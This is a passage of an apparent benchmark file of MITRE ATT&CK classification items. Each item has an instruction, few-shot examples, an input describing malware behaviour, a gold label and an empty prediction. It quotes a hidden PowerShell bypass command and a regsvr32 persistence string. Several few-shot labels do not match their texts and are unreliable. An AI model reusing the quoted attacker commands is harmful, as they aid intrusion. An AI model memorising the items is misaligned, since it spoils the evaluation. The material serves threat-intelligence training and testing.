framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MobileOrder starts by registering itself as device administrator so that a normal user cannot uninstall it by simply clicking \u201cuninstall\u201d in settings\n\t - T1105: Ingress Tool Transfer\n- Text: RAR Creates RAR files per logical drive containing data with timestamps for the past 7 days, then uploads RAR to the C2 server using a POST command at the path \u201c/FeedBack.php\u201d\n\t - T1041: Exfiltration Over C2 Channel\n\t - T1560: Archive Collected Data\n- Text: Kevin can exfiltrate data to the C2 server in 27-character chunks.\n\t - T1030: Data Transfer Size Limits\n", + "input": "OopsIE can download files from its C2 server to the victim's machine.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Astaroth can be loaded through regsvr32.exe.\n\t - T1218.010: System Binary Proxy Execution - Regsvr32\n- Text: Otherwise, it will add the binary\u2019s path to the Software\\Microsoft\\Windows\\CurrentVersion\\Run key with \u2014Update as a parameter\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: can terminate a specific process by its process id.\n\t - T1543.003: Create or Modify System Process - Windows Service\n", + "input": "Inception has ensured persistence at system boot by setting the value \"regsvr32 %path%\\ctfmonrn.dll /s\".", + "gold": "- T1218.010: System Binary Proxy Execution - Regsvr32", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has a tool called CANDYKING to capture a screenshot of user's desktop.\n\t - T1113: Screen Capture\n- Text: Bandook has modules that are capable of capturing video from a victim's webcam.\n\t - T1125: Video Capture\n- Text: Cobian RAT has a feature to perform voice recording on the victim\u2019s machine.\n\t - T1123: Audio Capture\n", + "input": "FIN7 captured screenshots and desktop video recordings.", + "gold": "- T1113: Screen Capture", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Various scans and queries are used to find proxy settings, domain controllers, remote desktop services, Citrix services, and network shares. Otherwise, a jump host or other system likely used by domain admins is found and equipped with a Cobalt Strike beacon\n\t - T1012: Query Registry\n- Text: WarzoneRAT can create `HKCU\\Software\\Classes\\Folder\\shell\\open\\command` as a new registry key during privilege escalation.\n\t - T1112: Modify Registry\n- Text: This is a guest post by independent security researcher James Quinn. This will be Part 1 of a series titled Reversing Gh0stRAT Variants. As 2018 drew to a close and 2019 took over, I began to see a different behavior from SMB malware authors. Instead of massive, multi-staged cryptocurrency miners, I began to see more small, covert RATs serving as partial stage1\u2019s. Of these samples, there was one specific sample that stood out to me. A Gh0stRAT variant, this sample not only changed the Gh0stRAT header from \u201cGh0st\u201d to \u201cnbLGX\u201d, it also hid its traffic with an encryption algorithm over the entire TCP segment, in addition to the standard Zlib compression on the Gh0stRAT data. Some key functionality is below: Can download more malware Offline Keylogger Cleans Event logs\n\t - T1070: Indicator Removal\n", + "input": "SUNBURST collected the registry value \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid\" from compromised hosts.", + "gold": "- T1012: Query Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: StrongPity has been bundled with legitimate software installation files for disguise.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: Saint Bot has renamed malicious binaries as `wallpaper.mp4` and `slideshow.mp4` to avoid detection.\n\t - T1036: Masquerading\n- Text: Shamoon creates the new malicious service MaintenaceSrv. It creates the service with the option Autostart (StartType: 2) and runs the service with its own process (ServiceType: 0x10\n\t - T1036.004: Masquerading - Masquerade Task or Service\n", + "input": "SideCopy has used a legitimate DLL file name, `Duser.dll` to disguise a malicious remote access tool.", + "gold": "- T1036.005: Masquerading - Match Legitimate Name or Location", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Based on our technical analysis, telemetry, and data from submissions, we can assert with high confidence that this is the work of the Hidden Cobra group. These initial findings appear to be the first stage of Operation GhostSecret. For more on the global aspect of this threat, see \u201cGlobal Malware Campaign Pilfers Data from Critical Infrastructure of Entertainment, Finance, Health Care, and Other Industries\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: Stuxnet encrypts exfiltrated data via C2 with static 31-byte long XOR keys.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: 4) Special attention was given to the design of the network communication, in order to reduce the noise a large number of encrypted machines may generate while contacting the Command and Control servers. 5) The encryption scheme is solid \u2013 using the AES and RSA algorithms\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n\t - T1486: Data Encrypted for Impact\n", + "input": "MoonWind encrypts C2 traffic using RC4 with a static key.", + "gold": "- T1573.001: Encrypted Channel - Symmetric Cryptography", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The attackers orchestrate attacks using batch or PowerShell scripts that are executed, with the help of domain controllers, on any machine the DC can reach. The scripts retrieve the attackers\u2019 payloads using psexec or certutil\n\t - T1105: Ingress Tool Transfer\n\t - T1569.002: System Services - Service Execution\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: BOOSTWRITE has used the DWriteCreateFactory() function to load additional modules.\n\t - T1129: Shared Modules\n- Text: can delete services from the victim\u2019s machine.\n\t - T1543.003: Create or Modify System Process - Windows Service\n", + "input": "APT32's backdoor has used Windows services as a way to execute its malicious payload.", + "gold": "- T1569.002: System Services - Service Execution", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: It will use an auto-run registry (HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run) named AdobeMX that will execute PowerShell to load the encoded executable via reflective loading (loading an executable from memory rather than from the system\u2019s disks\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: Gelsemium can use custom shellcode to map embedded DLLs into memory.\n\t - T1620: Reflective Code Loading\n- Text: Koadic can use mshta to serve additional payloads and to help schedule tasks for persistence.\n\t - T1218.005: System Binary Proxy Execution - Mshta\n", + "input": "Revenge RAT uses the PowerShell command \"Reflection.Assembly\" to load itself into memory to aid in execution.", + "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Each web shell instance is configured to contain SP, Key, and Log variables. When the malicious ISAPI filter captures a username matching this variable, it knows to handle the incoming HTTP request as a command to the web shell. The DES key to encrypt the credentials in the configuration observed by CTU researchers is 12345678, and the log file is c:\\log.txt. The decrypted contents of the log file adhere to the format in Figure 22\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: USBStealer collects files matching certain criteria from the victim and stores them in a local directory for later exfiltration.\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: BRONZE UNION has also leveraged various web shells to collect and stage data for exfiltration. In one instance, the threat actor gained remote access to a high-value system in a compromised network, ran quser.exe to identify existing RDP sessions on the device, immediately ran a command to compile a RAR archive that specified file types the threat actor did not want, and used a password to encrypt the archive\n\t - T1560.002: Archive Collected Data - Archive via Library\n\t - T1074.001: Data Staged - Local Data Staging\n\t - T1049: System Network Connections Discovery\n", + "input": "Data SPACESHIP copies to the staging area is compressed with zlib. Bytes are rotated by four positions and XOR'ed with 0x23.", + "gold": "- T1560.003: Archive Collected Data - Archive via Custom Method", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT29 has created self-signed digital certificates to enable mutual TLS authentication for malware.\n\t - T1587.003: Develop Capabilities - Digital Certificates\n- Text: The actor has distributed its dropper embedded in an archive file (\uc678\uad50\ubd80 \uac00\ud310 2021-05-07.zip) as an attachment through spearphishing emails. The archive file contains a JavaScript file (\uc678\uad50\ubd80 \uac00\ud310 2021-05-07.pdf.jse) which pretends to be a PDF file that contains two Base64 encoded blobs. The first one is the content of the decoy PDF file in Base64 format and the other one contains the AppleSeed payload also in Base64 format (encoded twice\n\t - T1204.002: User Execution - Malicious File\n\t - T1027: Obfuscated Files or Information\n- Text: OilRig has delivered malicious links to achieve execution on the target system.\n\t - T1204.001: User Execution - Malicious Link\n", + "input": "For C0011, Transparent Tribe used malicious VBA macros within a lure document as part of the Crimson malware installation process onto a compromised host.", + "gold": "- T1059.005: Command and Scripting Interpreter - Visual Basic", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Reaver deletes the original dropped file from the victim.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: Lazarus Group has routinely deleted log files on a compromised router, including automatic log deletion through the use of the logrotate utility.\n\t - T1070.003: Indicator Removal - Clear Command History\n- Text: is capable of deleting Registry keys, sub-keys, and values on a victim system.\n\t - T1112: Modify Registry\n", + "input": "Cobalt Group deleted the DLL dropper from the victim\u2019s machine to cover their tracks.", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FIN6 has used the Stealer One credential stealer to target web browsers.\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: Harvest cookies and a password database for supported browsers. Supports: Win7 IE, Win10 IE, Edge, Chrome, and Naver Whale - Recursively search a path and upload file metadata (timestamps, size, and full path). - Spawn a thread to recursively search a path and upload files as a ZIP archive\n\t - T1539: Steal Web Session Cookie\n- Text: Leafminer used several tools for retrieving login and password information, including LaZagne.\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n\t - T1555: Credentials from Password Stores\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n", + "input": "Stolen Pencil has used tools that are capable of obtaining credentials from web browsers.", + "gold": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Windows Credential Editor can dump credentials.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: has performed credential dumping with and Lazagne.\n\t - T1003: OS Credential Dumping\n- Text: LaZagne can perform credential dumping from MSCache to obtain account and password information.\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n", + "input": "APT1 has been known to use credential dumping using Mimikatz.", + "gold": "- T1003.001: OS Credential Dumping - LSASS Memory", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Whenever winword makes any graphical call, the shellcode executes. This technique to hijack control flow has also been used by other sophisticated attackers such as FinFisher. Lazarus has also used other novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to shellcode written to executable heap\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1574.013: Hijack Execution Flow - KernelCallbackTable\n\t - T1620: Reflective Code Loading\n- Text: Carberp has queued an APC routine to explorer.exe by calling ZwQueueApcThread.\n\t - T1055.004: Process Injection - Asynchronous Procedure Call\n- Text: SDBbot has the ability to clean up and remove data structures from a compromised host.\n\t - T1070: Indicator Removal\n", + "input": "FinFisher has used the \"KernelCallbackTable\" to hijack the execution flow of a process by replacing the \"__fnDWORD\" function with the address of a created Asynchronous Procedure Call stub routine.", + "gold": "- T1574.013: Hijack Execution Flow - KernelCallbackTable", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Upon exploitation, a GH0ST RAT variant is delivered to the victims\u2019 system, which calls out to a previously known APT18 CnC address 223.25.233.248. GH0ST RAT is a backdoor derived from public source code\n\t - T1070.001: Indicator Removal - Clear Windows Event Logs\n\t - T1059: Command and Scripting Interpreter\n- Text: Caterpillar WebShell has a command to modify a Registry key.\n\t - T1112: Modify Registry\n- Text: SLOTHFULMEDIA has deleted itself and the 'index.dat' file on a compromised machine to remove recent Internet history from the system.\n\t - T1070.004: Indicator Removal - File Deletion\n", + "input": "FIN8 has deleted Registry keys during post compromise cleanup activities.", + "gold": "- T1112: Modify Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Machete stores files and logs in a folder on the local drive.\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: Kevin can create directories to store logs and other collected data.\n\t - T1074: Data Staged\n- Text: Kessel can RC4-encrypt credentials before sending to the C2.\n\t - T1560: Archive Collected Data\n", + "input": "Chrommme can store captured system information locally prior to exfiltration.", + "gold": "- T1074.001: Data Staged - Local Data Staging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The executable obtains an embedded PowerShell script, decrypts it using RC4, then decompresses it using ZLIB, and saves the cleartext to C:\\Users\\\\AppData\\Roaming\\Out.jpg\n\t - T1033: System Owner/User Discovery\n- Text: collects system information from the victim, including CPU speed, computer name, volume serial number, ANSI code page, OEM code page identifier for the OS, Microsoft Windows version, and memory information.\n\t - T1082: System Information Discovery\n- Text: Instructions within guide.txt explaining how to carry out DNS hijacking attack In one part of guide.txt, an example target appears to be provided, with a corresponding adversary IP (185.162.235[.]106) for the legitimate domain to be redirected to\n\t - T1016: System Network Configuration Discovery\n", + "input": "SpicyOmelette can identify the system name of a compromised host.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Office365DCOMCheck.ps1 and SystemDiskClean.ps1): wscript.exe \"Office365DCOMCheck.vbs\" \\\"PowerShell.exe -ExecutionPolicy bypass -WindowStyle hidden -NoProfile '' \\\" After setting up persistent access, the payload checks to see if a value exists within a registry key in the HKCU hive whose name is the same as the scheduled task (ex\n\t - T1036: Masquerading\n\t - T1012: Query Registry\n- Text: BLINDINGCAN has been delivered by phishing emails containing malicious Microsoft Office documents.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: The White Company has used phishing lure documents that trick users into opening them and infecting their computers.\n\t - T1204.002: User Execution - Malicious File\n", + "input": "RTM has been delivered as archived Windows executable files masquerading as PDF documents.", + "gold": "- T1036: Masquerading", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Bazar can use a timer to delay execution of core functionality.\n\t - T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion\n- Text: Machete sends stolen data to the C2 server every 10 minutes.\n\t - T1029: Scheduled Transfer\n- Text: IceApple is an IIS post-exploitation framework, consisting of 18 modules that provide several functionalities.\n\t - T1505.004: Server Software Component - IIS Components\n", + "input": "StrifeWater can modify its sleep time responses from the default of 20-22 seconds.", + "gold": "- T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Crimson can spread across systems by infecting removable media.\n\t - T1091: Replication Through Removable Media\n- Text: The plugin proceeds to iterate through all connected drives on the system, looking for removable drives\n\t - T1120: Peripheral Device Discovery\n- Text: Shamoon attempts to copy itself to remote machines on the network.\n\t - T1570: Lateral Tool Transfer\n", + "input": "Aoqin Dragon has used a dropper that employs a worm infection strategy using a removable device to breach a secure network environment.", + "gold": "- T1091: Replication Through Removable Media", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Stuxnet encrypts exfiltrated data via C2 with static 31-byte long XOR keys.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: Remexi boasts features that allow it to gather keystrokes, take screenshots of windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote commands. Encryption consists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting the victim\u2019s data\n\t - T1027: Obfuscated Files or Information\n\t - T1560: Archive Collected Data\n- Text: Aria-body has used ZIP to compress data gathered on a compromised host.\n\t - T1560: Archive Collected Data\n", + "input": "SUGARDUMP has encrypted collected data using AES CBC mode and encoded it using Base64.", + "gold": "- T1560.003: Archive Collected Data - Archive via Custom Method", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: No matching sample found for T1498\n- Text: POLONIUM has used the AirVPN service for operational activity.\n\t - T1090: Proxy\n- Text: CISA also observed the threat actor using open-source tools such as Plink and TightVNC for lateral movement. CISA observed the threat actor using the techniques identified in table 8 for lateral movement within the victim environment\n\t - T1090: Proxy\n\t - T1021.004: Remote Services - SSH\n\t - T1572: Protocol Tunneling\n", + "input": "Leviathan has used multi-hop proxies to disguise the source of their malicious traffic.", + "gold": "- T1090.003: Proxy - Multi-hop Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The contents of the batch files vary depending on the OS (x64 vs x86). The batch files perform these tasks: Stop the service COMSysApp Configure the service to autostart (to set up persistence on the system) Modify registry keys to launch the DLL unser svchost.exe Specify the malicious DLL path to be loaded into the svchost process\n\t - T1055: Process Injection\n\t - T1112: Modify Registry\n\t - T1064: Scripting\n\t - T1569.002: System Services - Service Execution\n- Text: When the Trojan runs as an executable within the \"DsvHelper\" folder, the Trojan will create a shortcut (.lnk file) and save the shortcut to the 'DsvHelper' folder. The embedded payload written to process memory exists in the \"R\" resource and called function in the new payload is named \"RPe.Test.Work\". The function will take another executable embedded in the initial Trojan as a resource named \"M\", which it attempts to inject into the following process to execute: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe While it's configured to inject into cvtres.exe, the Trojan is also capable of injecting its code into the following process as well: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe\n\t - T1055.012: Process Injection - Process Hollowing\n- Text: Saint Bot has injected its DLL component into `EhStorAurhn.exe`.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n", + "input": "Remcos has a command to hide itself through injecting into another process.", + "gold": "- T1055: Process Injection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: KONNI has used \"net session\" on the victim's machine.\n\t - T1049: System Network Connections Discovery\n- Text: LAPSUS$ has used DCSync attacks to gather credentials for privilege escalation routines.\n\t - T1003.006: OS Credential Dumping - DCSync\n- Text: No matching sample found for T1070.007\n", + "input": "Earth Lusca employed a PowerShell script called RDPConnectionParser to read and filter the Windows event log \u201cMicrosoft-Windows-TerminalServices-RDPClient/Operational\u201d\n(Event ID 1024) to obtain network information from RDP connections. Earth Lusca has also used netstat from a compromised system to obtain network connection information.", + "gold": "- T1049: System Network Connections Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MuddyWater has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n- Text: Gamaredon Group malware has collected Microsoft Office documents from mapped network drives.\n\t - T1039: Data from Network Shared Drive\n- Text: RTM monitors browsing activity and automatically captures screenshots if a victim browses to a URL matching one of a list of strings.\n\t - T1119: Automated Collection\n", + "input": "Sowbug extracted documents and bundled them into a RAR archive.", + "gold": "- T1560.001: Archive Collected Data - Archive via Utility", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FIN7 has conducted broad phishing campaigns using malicious links.\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: Sandworm Team has tricked unwitting recipients into clicking on malicious hyperlinks within emails crafted to resemble trustworthy senders.\n\t - T1204.001: User Execution - Malicious Link\n- Text: Magic Hound has used SMS and email messages with links designed to steal credentials.\n\t - T1598.003: Phishing for Information - Spearphishing Link\n", + "input": "MuddyWater has sent targeted spearphishing e-mails with malicious links.", + "gold": "- T1566.002: Phishing - Spearphishing Link", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their 